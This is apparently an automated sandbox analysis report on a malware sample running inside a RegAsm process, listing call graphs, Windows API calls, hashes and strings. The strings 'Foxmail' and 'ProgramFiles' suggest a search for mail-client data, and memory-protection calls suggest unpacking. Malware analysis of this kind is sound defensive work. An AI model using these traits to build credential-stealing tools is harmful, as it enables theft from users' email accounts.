10001f52 6861 10002041 6860->6861 6862 10001f7c 6860->6862 6869 10001f57 ___scrt_is_nonwritable_in_current_image 6860->6869 6898 10002639 IsProcessorFeaturePresent 6861->6898 6886 100023de 6862->6886 6865 10002048 6866 10001f8b __RTC_Initialize 6866->6869 6889 100022fc RtlInitializeSListHead 6866->6889 6868 10001f99 ___scrt_initialize_default_local_stdio_options 6890 100046c5 6868->6890 6873 10001fb8 6873->6869 6874 10004669 _abort 5 API calls 6873->6874 6874->6869 6876 10002485 6875->6876 6902 10002933 IsProcessorFeaturePresent 6876->6902 6880 10002496 6881 1000249a 6880->6881 6913 100053c8 6880->6913 6881->6860 6884 100024b1 6884->6860 6969 100024b5 6886->6969 6888 100023e5 6888->6866 6889->6868 6893 100046dc 6890->6893 6891 10002ada _ValidateLocalCookies 5 API calls 6892 10001fad 6891->6892 6892->6869 6894 100023b3 6892->6894 6893->6891 6895 100023b8 ___scrt_release_startup_lock 6894->6895 6896 10002933 ___isa_available_init IsProcessorFeaturePresent 6895->6896 6897 100023c1 6895->6897 6896->6897 6897->6873 6899 1000264e ___scrt_fastfail 6898->6899 6900 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6899->6900 6901 10002744 ___scrt_fastfail 6900->6901 6901->6865 6903 10002491 6902->6903 6904 100034ea 6903->6904 6905 100034ef ___vcrt_initialize_winapi_thunks 6904->6905 6924 10003936 6905->6924 6908 100034fd 6908->6880 6910 10003505 6911 10003510 6910->6911 6938 10003972 6910->6938 6911->6880 6961 10007457 6913->6961 6916 10003529 6917 10003532 6916->6917 6918 10003543 6916->6918 6919 1000391b ___vcrt_uninitialize_ptd 5 API calls 6917->6919 6918->6881 6920 10003537 6919->6920 6921 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6920->6921 6922 1000353c 6921->6922 6965 10003c50 6922->6965 6926 1000393f 6924->6926 6927 10003968 6926->6927 6928 100034f9 6926->6928 6942 10003be0 6926->6942 6929 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6927->6929 6928->6908 6930 100038e8 6928->6930 6929->6928 6947 10003af1 6930->6947 6933 100038fd 6933->6910 6934 10003ba2 ___vcrt_FlsSetValue 5 API calls 6935 1000390b 6934->6935 6936 10003918 6935->6936 6952 1000391b 6935->6952 6936->6910 6939 1000399c 6938->6939 6940 1000397d 6938->6940 6939->6908 6941 10003987 RtlDeleteCriticalSection 6940->6941 6941->6939 6941->6941 6943 10003a82 try_get_function 4 API calls 6942->6943 6944 10003bfa 6943->6944 6945 10003c18 InitializeCriticalSectionAndSpinCount 6944->6945 6946 10003c03 6944->6946 6945->6946 6946->6926 6948 10003a82 try_get_function 4 API calls 6947->6948 6949 10003b0b 6948->6949 6950 10003b24 TlsAlloc 6949->6950 6951 100038f2 6949->6951 6951->6933 6951->6934 6953 1000392b 6952->6953 6954 10003925 6952->6954 6953->6933 6956 10003b2c 6954->6956 6957 10003a82 try_get_function 4 API calls 6956->6957 6958 10003b46 6957->6958 6959 10003b5e TlsFree 6958->6959 6960 10003b52 6958->6960 6959->6960 6960->6953 6964 10007470 6961->6964 6962 10002ada _ValidateLocalCookies 5 API calls 6963 100024a3 6962->6963 6963->6884 6963->6916 6964->6962 6966 10003c7f 6965->6966 6967 10003c59 6965->6967 6966->6918 6967->6966 6968 10003c69 FreeLibrary 6967->6968 6968->6967 6970 100024c4 6969->6970 6971 100024c8 6969->6971 6970->6888 6972 10002639 ___scrt_fastfail 4 API calls 6971->6972 6974 100024d5 ___scrt_release_startup_lock 6971->6974 6973 10002559 6972->6973 6974->6888 6975 10005bff 6983 10005d5c 6975->6983 6978 10005c13 6979 10005b7a _free 19 API calls 6980 10005c1b 6979->6980 6981 10005c28 6980->6981 6990 10005c2b 6980->6990 6984 10005c45 _abort 4 API calls 6983->6984 6985 10005d83 6984->6985 6986 10005d9b TlsAlloc 6985->6986 6987 10005d8c 6985->6987 6986->6987 6988 10002ada _ValidateLocalCookies 5 API calls 6987->6988 6989 10005c09 6988->6989 6989->6978 6989->6979 6991 10005c3b 6990->6991 6992 10005c35 6990->6992 6991->6978 6994 10005db2 6992->6994 6995 10005c45 _abort 4 API calls 6994->6995 6996 10005dd9 6995->6996 6997 10005df1 TlsFree 6996->6997 6998 10005de5 6996->6998 6997->6998 6999 10002ada _ValidateLocalCookies 5 API calls 6998->6999 7000 10005e02 6999->7000 7000->6991 7724 100067bf 7729 100067f4 7724->7729 7727 100067db 7728 1000571e _free 19 API calls 7728->7727 7730 10006806 7729->7730 7739 100067cd 7729->7739 7731 10006836 7730->7731 7732 1000680b 7730->7732 7731->7739 7740 100071d6 7731->7740 7733 1000637b _abort 19 API calls 7732->7733 7735 10006814 7733->7735 7737 1000571e _free 19 API calls 7735->7737 7736 10006851 7738 1000571e _free 19 API calls 7736->7738 7737->7739 7738->7739 7739->7727 7739->7728 7741 100071e1 7740->7741 7742 10007209 7741->7742 7743 100071fa 7741->7743 7744 10007218 7742->7744 7749 10008a98 7742->7749 7745 10006368 _free 19 API calls 7743->7745 7756 10008acb 7744->7756 7748 100071ff ___scrt_fastfail 7745->7748 7748->7736 7750 10008aa3 7749->7750 7751 10008ab8 RtlSizeHeap 7749->7751 7752 10006368 _free 19 API calls 7750->7752 7751->7744 7753 10008aa8 7752->7753 7754 100062ac ___std_exception_copy 25 API calls 7753->7754 7755 10008ab3 7754->7755 7755->7744 7757 10008ae3 7756->7757 7758 10008ad8 7756->7758 7760 10008aeb 7757->7760 7766 10008af4 _abort 7757->7766 7759 100056d0 20 API calls 7758->7759 7764 10008ae0 7759->7764 7761 1000571e _free 19 API calls 7760->7761 7761->7764 7762 10008af9 7765 10006368 _free 19 API calls 7762->7765 7763 10008b1e RtlReAllocateHeap 7763->7764 7763->7766 7764->7748 7765->7764 7766->7762 7766->7763 7767 1000474f _abort 7 API calls 7766->7767 7767->7766

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1083526818-0
                                                                                                                                                                                                                      • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                                      • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                                                                      Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                                        • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                                        • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                                        • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                                        • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                      • API String ID: 672098462-2938083778
                                                                                                                                                                                                                      • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                                      • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                                                                                                                                      Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 54 10008821-1000883a 55 10008850-10008855 54->55 56 1000883c-1000884c call 10009341 54->56 58 10008862-10008886 MultiByteToWideChar 55->58 59 10008857-1000885f 55->59 56->55 63 1000884e 56->63 61 10008a19-10008a2c call 10002ada 58->61 62 1000888c-10008898 58->62 59->58 64 1000889a-100088ab 62->64 65 100088ec 62->65 63->55 68 100088ca-100088db call 100056d0 64->68 69 100088ad-100088bc call 1000bf20 64->69 67 100088ee-100088f0 65->67 71 100088f6-10008909 MultiByteToWideChar 67->71 72 10008a0e 67->72 68->72 82 100088e1 68->82 69->72 81 100088c2-100088c8 69->81 71->72 75 1000890f-10008921 call 10005f19 71->75 76 10008a10-10008a17 call 10008801 72->76 84 10008926-1000892a 75->84 76->61 83 100088e7-100088ea 81->83 82->83 83->67 84->72 86 10008930-10008937 84->86 87 10008971-1000897d 86->87 88 10008939-1000893e 86->88 90 100089c9 87->90 91 1000897f-10008990 87->91 88->76 89 10008944-10008946 88->89 89->72 94 1000894c-10008966 call 10005f19 89->94 95 100089cb-100089cd 90->95 92 10008992-100089a1 call 1000bf20 91->92 93 100089ab-100089bc call 100056d0 91->93 99 10008a07-10008a0d call 10008801 92->99 106 100089a3-100089a9 92->106 93->99 108 100089be 93->108 94->76 109 1000896c 94->109 95->99 100 100089cf-100089e8 call 10005f19 95->100 99->72 100->99 112 100089ea-100089f1 100->112 111 100089c4-100089c7 106->111 108->111 109->72 111->95 113 100089f3-100089f4 112->113 114 10008a2d-10008a33 112->114 115 100089f5-10008a05 WideCharToMultiByte 113->115 114->115 115->99 116 10008a35-10008a3c call 10008801 115->116 116->76
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                                                                      • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                                      • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                                                                      Function 1000C7E6 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 119 1000c7e6-1000c7ed GetModuleHandleA 120 1000c82d 119->120 121 1000c7ef-1000c7fe call 1000c803 119->121 123 1000c82f-1000c833 120->123 131 1000c800 121->131 132 1000c865 121->132 124 1000c872 call 1000c877 123->124 125 1000c835-1000c83d GetModuleHandleA 123->125 127 1000c83f-1000c847 125->127 127->127 130 1000c849-1000c84c 127->130 130->123 133 1000c84e-1000c850 130->133 134 1000c809-1000c80b 131->134 135 1000c804 call 1000c897 131->135 136 1000c866-1000c86e 132->136 137 1000c852-1000c854 133->137 138 1000c856-1000c85e 133->138 134->120 140 1000c80d-1000c81a VirtualProtect 134->140 135->134 142 1000c870 136->142 141 1000c85f-1000c860 call 1000c897 137->141 138->141 143 1000c82c 140->143 144 1000c81c-1000c82a VirtualProtect 140->144 141->132 142->130 143->120 144->143
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2905821283-0
                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                                                                      Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 147 10005ce1-10005cf5 148 10005d02-10005d1d LoadLibraryExW 147->148 149 10005cf7-10005d00 147->149 151 10005d46-10005d4c 148->151 152 10005d1f-10005d28 GetLastError 148->152 150 10005d59-10005d5b 149->150 155 10005d55 151->155 156 10005d4e-10005d4f FreeLibrary 151->156 153 10005d37 152->153 154 10005d2a-10005d35 LoadLibraryExW 152->154 157 10005d39-10005d3b 153->157 154->157 158 10005d57-10005d58 155->158 156->155 157->151 159 10005d3d-10005d44 157->159 158->150 159->158
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                      • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                                      • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                                                                      Function 1000C7A7 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 160 1000c7a7-1000c7bc 161 1000c82d 160->161 162 1000c7be-1000c7c6 160->162 164 1000c82f-1000c833 161->164 162->161 163 1000c7c8-1000c7f6 call 1000c7e6 162->163 171 1000c7f8 163->171 172 1000c86c-1000c86e 163->172 165 1000c872 call 1000c877 164->165 166 1000c835-1000c83d GetModuleHandleA 164->166 168 1000c83f-1000c847 166->168 168->168 173 1000c849-1000c84c 168->173 174 1000c7fa-1000c7fe 171->174 175 1000c85b-1000c85e 171->175 177 1000c870 172->177 178 1000c866-1000c86b 172->178 173->164 176 1000c84e-1000c850 173->176 183 1000c800 174->183 184 1000c865 174->184 179 1000c85f-1000c860 call 1000c897 175->179 181 1000c852-1000c854 176->181 182 1000c856-1000c85a 176->182 177->173 178->172 179->184 181->179 182->175 186 1000c809-1000c80b 183->186 187 1000c804 call 1000c897 183->187 184->178 186->161 188 1000c80d-1000c81a VirtualProtect 186->188 187->186 189 1000c82c 188->189 190 1000c81c-1000c82a VirtualProtect 188->190 189->161 190->189
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                        • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2905821283-0
                                                                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                                                                      Function 1000C803 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 191 1000c803-1000c80b call 1000c897 194 1000c82d 191->194 195 1000c80d-1000c81a VirtualProtect 191->195 198 1000c82f-1000c833 194->198 196 1000c82c 195->196 197 1000c81c-1000c82a VirtualProtect 195->197 196->194 197->196 199 1000c872 call 1000c877 198->199 200 1000c835-1000c83d GetModuleHandleA 198->200 201 1000c83f-1000c847 200->201 201->201 203 1000c849-1000c84c 201->203 203->198 204 1000c84e-1000c850 203->204 205 1000c852-1000c854 204->205 206 1000c856-1000c85e 204->206 207 1000c85f-1000c865 call 1000c897 205->207 206->207 211 1000c866-1000c86e 207->211 213 1000c870 211->213 213->203
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual$HandleModule
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3519776433-0
                                                                                                                                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                                                                      Function 10006ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 214 10006acb-10006aff GetCPInfo 215 10006bf5-10006c02 214->215 216 10006b05 214->216 217 10006c08-10006c18 215->217 218 10006b07-10006b11 216->218 219 10006c24-10006c2b 217->219 220 10006c1a-10006c22 217->220 218->218 221 10006b13-10006b26 218->221 224 10006c3b 219->224 225 10006c2d-10006c34 219->225 223 10006c37-10006c39 220->223 222 10006b47-10006b49 221->222 226 10006b28-10006b2f 222->226 227 10006b4b-10006b82 call 100086e4 call 10008a3e 222->227 228 10006c3d-10006c4c 223->228 224->228 225->223 229 10006b3e-10006b40 226->229 239 10006b87-10006bb2 call 10008a3e 227->239 228->217 231 10006c4e-10006c5e call 10002ada 228->231 232 10006b31-10006b33 229->232 233 10006b42-10006b45 229->233 232->233 236 10006b35-10006b3d 232->236 233->222 236->229 242 10006bb4-10006bbe 239->242 243 10006bc0-10006bcc 242->243 244 10006bce-10006bd0 242->244 247 10006bde-10006be5 243->247 245 10006bd2-10006bd7 244->245 246 10006be7 244->246 245->247 248 10006bee-10006bf1 246->248 247->248 248->242 249 10006bf3 248->249 249->231
                                                                                                                                                                                                                      APIs
